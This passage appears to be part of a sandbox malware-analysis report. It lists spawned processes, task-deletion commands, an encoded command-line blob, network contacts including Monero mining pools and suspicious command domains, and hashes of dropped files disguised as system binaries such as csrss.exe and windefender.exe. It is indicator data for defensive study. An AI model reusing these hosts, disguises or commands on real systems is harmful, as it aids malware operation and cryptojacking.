C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "csrss" /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn "ScheduledUpdate" /f

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

C:\Users\Admin\AppData\Roaming\ugrceei

C:\Users\Admin\AppData\Roaming\ugrceei

C:\Users\Admin\AppData\Roaming\ugrceei

C:\Users\Admin\AppData\Roaming\ugrceei

Network

Country Destination Domain Proto
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 209.197.3.8:80 tcp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 us.imgjeoigaa.com udp
HK 103.100.211.218:80 us.imgjeoigaa.com tcp
US 8.8.8.8:53 134.121.24.20.in-addr.arpa udp
US 8.8.8.8:53 218.211.100.103.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
DE 45.9.74.80:80 45.9.74.80 tcp
US 8.8.8.8:53 254.130.241.8.in-addr.arpa udp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
US 8.8.8.8:53 80.74.9.45.in-addr.arpa udp
US 8.8.8.8:53 aa.imgjeoogbb.com udp
HK 154.221.26.108:80 aa.imgjeoogbb.com tcp
US 8.8.8.8:53 108.26.221.154.in-addr.arpa udp
NL 45.12.253.56:80 45.12.253.56 tcp
US 8.8.8.8:53 56.253.12.45.in-addr.arpa udp
US 8.8.8.8:53 host-file-host6.com udp
N/A 194.50.153.68:80 host-file-host6.com tcp
US 8.8.8.8:53 host-host-file8.com udp
US 8.8.8.8:53 68.153.50.194.in-addr.arpa udp
US 8.8.8.8:53 c044c2b7-761f-47db-88d2-39c05970a7ba.uuid.duniadekho.bar udp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 stun.sipgate.net udp
US 8.8.8.8:53 server5.duniadekho.bar udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
DE 217.10.68.152:3478 stun.sipgate.net udp
BG 185.82.216.50:443 server5.duniadekho.bar tcp
US 8.8.8.8:53 luckytradeone.com udp
US 172.67.181.198:443 luckytradeone.com tcp
US 8.8.8.8:53 152.68.10.217.in-addr.arpa udp
US 8.8.8.8:53 233.134.159.162.in-addr.arpa udp
US 8.8.8.8:53 50.216.82.185.in-addr.arpa udp
US 8.8.8.8:53 198.181.67.172.in-addr.arpa udp
US 209.197.3.8:80 tcp
GB 96.16.110.41:443 tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
NL 51.15.55.162:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 162.55.15.51.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
NL 51.15.58.224:14433 xmr-eu1.nanopool.org tcp
US 8.8.8.8:53 143.67.20.104.in-addr.arpa udp
US 8.8.8.8:53 224.58.15.51.in-addr.arpa udp
US 8.8.8.8:53 stun1.l.google.com udp
IN 172.253.121.127:19302 stun1.l.google.com udp
US 8.8.8.8:53 127.121.253.172.in-addr.arpa udp
AU 104.46.162.226:443 tcp

Files

memory/3984-133-0x0000000000D70000-0x00000000011CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 bd14e0f9b9cef063a9a20e81162ea47c
SHA1 d0b09c991d4092b596da762d5fc7dc2eac1057a7
SHA256 011fa85ec8a678389fa5251cba5e4b3b478907dbccb87e8c2bdf3179370e4293
SHA512 4c9c1f138fb7f15b1e2731134de6f624ce45874216b6de2e370ef8c8ba0cd184c3dafa2e429972a96fd33dfd6fff6bb261cbb5e13a8d91fd02dbd537e6643fad

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 bd14e0f9b9cef063a9a20e81162ea47c
SHA1 d0b09c991d4092b596da762d5fc7dc2eac1057a7
SHA256 011fa85ec8a678389fa5251cba5e4b3b478907dbccb87e8c2bdf3179370e4293
SHA512 4c9c1f138fb7f15b1e2731134de6f624ce45874216b6de2e370ef8c8ba0cd184c3dafa2e429972a96fd33dfd6fff6bb261cbb5e13a8d91fd02dbd537e6643fad

C:\Users\Admin\AppData\Local\Temp\aafg31.exe

MD5 bd14e0f9b9cef063a9a20e81162ea47c
SHA1 d0b09c991d4092b596da762d5fc7dc2eac1057a7
SHA256 011fa85ec8a678389fa5251cba5e4b3b478907dbccb87e8c2bdf3179370e4293
SHA512 4c9c1f138fb7f15b1e2731134de6f624ce45874216b6de2e370ef8c8ba0cd184c3dafa2e429972a96fd33dfd6fff6bb261cbb5e13a8d91fd02dbd537e6643fad

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\oldplayer.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

C:\Users\Admin\AppData\Local\Temp\1000172001\setup.exe

MD5 a8f1aa449fbfd6e479c388d7bd7a08fd
SHA1 e771e44bffad0958f50eb5d68e94167cc846e2d8
SHA256 1eb17429e41c7e87c070adb5d68a11fa024f4e6598e50062168c44012975c3d4
SHA512 cb16124dc6ae5d02c99485d867dfdbd4308d393c559f599b7a1ce89168b7040f5237b3a90902718d0cfd08a205bfd518432ea8c438501c4a64a8910d20bd1e89

memory/1460-190-0x00000000005D0000-0x00000000005F6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/448-209-0x0000000003490000-0x0000000003600000-memory.dmp

memory/448-210-0x0000000003600000-0x0000000003731000-memory.dmp

memory/1460-211-0x0000000000610000-0x0000000000650000-memory.dmp

memory/1832-215-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000173001\toolspub2.exe

MD5 a53b97f33623010a204d53ca814e8dd2
SHA1 1c1498af4bfa07fd04b1cc455ed69ca00cebb3c1
SHA256 6ba96ab9e09801ed43485fae7797223a383554397e8de1ea71912cb843794bf0
SHA512 6a342c7816485d60ee8402b4119d0a15895e5610a4b96c1556d9c7cbaf4f8f10bbbce8b7ab081d9bda21788f31e70465ff25b99dae06bf6246ce7b23f03abd1b

memory/3840-217-0x0000000001CA0000-0x0000000001CA9000-memory.dmp

memory/1832-218-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/4924-235-0x0000000002B10000-0x0000000002F08000-memory.dmp

memory/4924-236-0x0000000002F10000-0x00000000037FB000-memory.dmp

memory/5076-237-0x0000000002FA0000-0x0000000002FD6000-memory.dmp

memory/5076-238-0x00000000058A0000-0x0000000005EC8000-memory.dmp

memory/5076-239-0x00000000056B0000-0x00000000056D2000-memory.dmp

memory/5076-240-0x0000000005ED0000-0x0000000005F36000-memory.dmp

memory/5076-241-0x0000000005F40000-0x0000000005FA6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q0xotskp.u1l.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5076-251-0x0000000005260000-0x0000000005270000-memory.dmp

memory/5076-252-0x0000000005260000-0x0000000005270000-memory.dmp

memory/3184-253-0x0000000002E80000-0x0000000002E96000-memory.dmp

memory/5076-258-0x0000000006570000-0x000000000658E000-memory.dmp

memory/1832-254-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1432-259-0x00007FF65C140000-0x00007FF65C4FD000-memory.dmp

memory/5076-260-0x0000000006B00000-0x0000000006B44000-memory.dmp

memory/5076-262-0x00000000078B0000-0x0000000007926000-memory.dmp

memory/1460-263-0x0000000000400000-0x00000000004F3000-memory.dmp

memory/5076-264-0x0000000005260000-0x0000000005270000-memory.dmp

memory/5076-265-0x0000000007FB0000-0x000000000862A000-memory.dmp

memory/5076-266-0x0000000007930000-0x000000000794A000-memory.dmp

memory/5076-267-0x0000000007AF0000-0x0000000007B22000-memory.dmp

memory/5076-268-0x0000000073EA0000-0x0000000073EEC000-memory.dmp

memory/5076-269-0x000000006EC90000-0x000000006EFE4000-memory.dmp

memory/5076-279-0x0000000007AD0000-0x0000000007AEE000-memory.dmp

memory/5076-280-0x000000007F260000-0x000000007F270000-memory.dmp

memory/5076-281-0x0000000007C20000-0x0000000007C2A000-memory.dmp

memory/5076-282-0x0000000007CE0000-0x0000000007D76000-memory.dmp

memory/448-283-0x0000000003600000-0x0000000003731000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/5076-285-0x0000000007C80000-0x0000000007C8E000-memory.dmp

memory/5076-286-0x0000000007D80000-0x0000000007D9A000-memory.dmp

memory/4924-287-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/5076-288-0x0000000007CC0000-0x0000000007CC8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000174001\3eef203fb515bda85f514e168abb5973.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/4924-293-0x0000000002F10000-0x00000000037FB000-memory.dmp

memory/4588-304-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/4588-305-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/4588-306-0x0000000002BF0000-0x0000000002C00000-memory.dmp

memory/4588-307-0x0000000073E60000-0x0000000073EAC000-memory.dmp

memory/4588-308-0x0000000072260000-0x00000000725B4000-memory.dmp

memory/4588-318-0x000000007F1C0000-0x000000007F1D0000-memory.dmp

memory/4924-321-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 56235f81bf474eb81bc06a1148f540f2
SHA1 bbf4269ee1c7b4f9e736f8f4ea2b5c642a934fa3
SHA256 0450b66763200193dd0bbb4c3532404bda4e30cf9f67216010dc4738fb625d42
SHA512 febe7a60fdc6622be1229a59fe5f61af40d79d94406500894cf8d379b7c9b82688343a16fe27814b067565257e1934d1ac339a63bb2ddb7aa1335aae9575ad65

memory/1020-336-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/2768-337-0x0000000005220000-0x0000000005230000-memory.dmp

memory/2768-339-0x0000000005220000-0x0000000005230000-memory.dmp

memory/2768-338-0x0000000005220000-0x0000000005230000-memory.dmp

memory/2768-340-0x0000000073E60000-0x0000000073EAC000-memory.dmp

memory/2768-341-0x0000000073970000-0x0000000073CC4000-memory.dmp

memory/2768-352-0x000000007F720000-0x000000007F730000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 f4695d7524d9a253a66e551839493dde
SHA1 80d085fc20f5fd4d044575be263daa1e4141bd1f
SHA256 9ee1b8b13bc91ff67c31772928425e900ac996799745dfcc66740d0e13367598
SHA512 3dfea6ef6c558d8e76d00a9aec777c7bd25512a6d6bc94b28a2f7925893051f05e3ba1e653b3839f7093c594e2e4bfd0340963be5266e853a4f35e3644e2772a

memory/4272-365-0x0000000002370000-0x0000000002380000-memory.dmp

memory/4272-364-0x0000000002370000-0x0000000002380000-memory.dmp

memory/4272-366-0x0000000073E60000-0x0000000073EAC000-memory.dmp

memory/4272-367-0x0000000072260000-0x00000000725B4000-memory.dmp

memory/4272-377-0x0000000002370000-0x0000000002380000-memory.dmp

memory/4272-378-0x000000007EF80000-0x000000007EF90000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

C:\Windows\rss\csrss.exe

MD5 451af59f1dc7bf09eaad8c27aab0a8fe
SHA1 a1e5d215d9e45937697d72e14d33476c6af4705c
SHA256 2273ad3c5739e3c75de32a37f690ccce141a76524c20cd773e267b6b93731606
SHA512 39b70ffa5e0b56fc6b550d0d16d00aec809f366a5dc1027b418e3198ae86a950d07721ed749776f6b3d9ce5eeea3b24895bd58aee66daa2ba8a5b5176bf6d41d

memory/1020-383-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 9c882515148beb212bc3fa4a4b340e2e
SHA1 1dda36a60092f34a8ad00b838af7759825fd90c6
SHA256 d5e939e5ca2adfef793052782c14f8d1d190c2d4ae5c06064d72d7223939c62c
SHA512 fc0304133cb7f5c0eae743b3a18454e606b6c8bd89a6e3bffdabfed94e5b9eb84bda8c40b4fdd8d085693778040f0c2a3a5f57e057bfa3efd450e4d36de60b39

memory/4584-397-0x0000000004620000-0x0000000004630000-memory.dmp

memory/4584-398-0x0000000004620000-0x0000000004630000-memory.dmp

memory/4584-399-0x0000000073E60000-0x0000000073EAC000-memory.dmp

memory/4584-400-0x0000000073970000-0x0000000073CC4000-memory.dmp

memory/4584-401-0x0000000004620000-0x0000000004630000-memory.dmp

memory/4584-411-0x000000007FA20000-0x000000007FA30000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 61106a50dcdd08752979c8988ac35425
SHA1 0189590baa6dd9ab8ec87432faa05211670ba374
SHA256 03541b63191b6de70090991d5a083704104c5c573bf5cf61d64ed85e5ec38c2f
SHA512 26593745453708b7a04b8d53737971731a2412c3941ecb6bc26398ef93f46b9230080b2981ea31400cb06e6c61b686d3ebb5facd60bb14acd9568891e71a9074

memory/3776-430-0x000001C647240000-0x000001C647262000-memory.dmp

memory/5076-434-0x0000000002570000-0x0000000002580000-memory.dmp

memory/3776-436-0x000001C647280000-0x000001C647290000-memory.dmp

memory/5076-435-0x0000000002570000-0x0000000002580000-memory.dmp

memory/3776-437-0x000001C647280000-0x000001C647290000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/5076-450-0x0000000073DD0000-0x0000000073E1C000-memory.dmp

memory/5076-451-0x0000000073970000-0x0000000073CC4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

memory/4940-462-0x000001B39FD90000-0x000001B39FDA0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\XandETC.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/1432-469-0x00007FF65C140000-0x00007FF65C4FD000-memory.dmp

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 f092f32149e596309c14847738613915
SHA1 99a13f4f6f0d7c993de88bcad59e03f444985a41
SHA256 2a69ec732917d70fa24348dbd6ad160a52d78ee168c234ebcbbe61f79bf95a7e
SHA512 77247d474c0233e7d9889b959d7c7a7b2e81601aef86cb781f8f293a1d59f3bb27e7531cf2a087dd97e3ed8d385ec2a9d52d2a8ca4ca88310199b58979bcfa4a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a31985d40108935c8ce70896d54528a2
SHA1 4e3a27b73eaac2d00b533f9c1dbe9f3c28b845c1
SHA256 e130df7be2343f0d907d33b797104044d0293d70e5fb05123c8f65a26e22d04b
SHA512 242299b8ade43470b64b365ee39bee26397c2b7b0802f0d9123fd681d7d82a1a6dd022e57130d7b0861f4f7b6d6f2f7d8605fdee6e46dc9c35d84dbaaeab2e16

C:\Program Files\Notepad\Chrome\updater.exe

MD5 3006b49f3a30a80bb85074c279acc7df
SHA1 728a7a867d13ad0034c29283939d94f0df6c19df
SHA256 f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512 e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

memory/2396-507-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2396-517-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/628-518-0x00007FF7A8F60000-0x00007FF7A931D000-memory.dmp

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec

memory/3404-526-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2396-528-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

MD5 a64a886a695ed5fb9273e73241fec2f7
SHA1 363244ca05027c5beb938562df5b525a2428b405
SHA256 563acabe49cc451e9caac20fae780bad27ea09aaefaaf8a1dfd838a00de97144
SHA512 122779ad7bce927e1b881df181fcc3181080d3929a67f750358fa446a21397b998d167c03aed5f3bdc3cd7a1f17e4da095f9b4a9367c6357cabefcf8cdd29474

memory/2396-533-0x0000000000400000-0x0000000000D1B000-memory.dmp

